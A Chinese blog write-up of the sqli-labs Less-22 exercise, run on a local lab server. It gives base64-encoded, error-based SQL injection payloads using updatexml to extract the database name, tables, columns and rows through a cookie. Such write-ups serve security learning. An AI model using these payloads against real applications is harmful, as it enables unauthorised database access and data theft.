侧边栏壁纸
博主头像
小志IT知识库博主等级

人生可以拼可以闯,但不能忘本!

  • 累计撰写 84 篇文章
  • 累计创建 45 个标签
  • 累计收到 106 条评论

目 录CONTENT

文章目录
靶场练习 sqli-labs

sqli-labs系列——Less-22

CZ
CZ
2023-06-20 / 0 评论 / 0 点赞 / 313 阅读 / 2863 字 / 正在检测是否收录...
温馨提示:
本文最后更新于 2024-04-24,若内容或图片失效,请留言反馈。部分素材来自网络,若不小心影响到您的利益,请联系我们删除。

前言

本题跟上题做法相似,只是符号的区别

前期准备

开启phpstudy,开启apache服务以及mysql服务

图片-1686619451321

实验环节

浏览器访问Less-22

http://192.168.199.135/sqli-labs-master/Less-22/

image-1687232194740

进行简单闭合,页面正常显示

Dumb" -- xz
base64编码后:RHVtYiIgLS0geHo=

image-1687232297513

判断库名

Dumb" and updatexml(1, concat(0x7e, database(), 0x7e), 1)-- xz
base64编码后:RHVtYiIgYW5kIHVwZGF0ZXhtbCgxLCBjb25jYXQoMHg3ZSwgZGF0YWJhc2UoKSwgMHg3ZSksIDEpLS0geHo=

image-1687231222310

判断表名

Dumb"and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security'limit 0,1),0x7e),1)-- xz
base64编码后:RHVtYiJhbmQgdXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKHNlbGVjdCB0YWJsZV9uYW1lIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnRhYmxlcyB3aGVyZSB0YWJsZV9zY2hlbWE9J3NlY3VyaXR5J2xpbWl0IDAsMSksMHg3ZSksMSktLSB4eg==

image-1687231317696

判断列名

Dumb"and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),0x7e),1) -- xz
base64编码后:RHVtYiJhbmQgdXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBjb2x1bW5fbmFtZSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS5jb2x1bW5zIHdoZXJlIHRhYmxlX3NjaGVtYT0nc2VjdXJpdHknIGFuZCB0YWJsZV9uYW1lPSdlbWFpbHMnIGxpbWl0IDAsMSksMHg3ZSksMSkgLS0geHo=

image-1687232026628

判断数据

Dumb"and updatexml(1,concat(0x7e,(select id from emails limit 0,1),0x7e),1)-- xz
base64编码后:RHVtYiJhbmQgdXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBpZCBmcm9tIGVtYWlscyBsaW1pdCAwLDEpLDB4N2UpLDEpLS0geHo=

image-1687232084835

0
sqli-labs bp抓包 报错注入 cookie注入 base64注入 sql注入
版权归属: CZ
本文链接: https://www.xzmcz.cn/archives/sqli-labs%E7%B3%BB%E5%88%97less-22
许可协议: 本文使用《署名-非商业性使用-相同方式共享 4.0 国际 (CC BY-NC-SA 4.0)》协议授权

评论区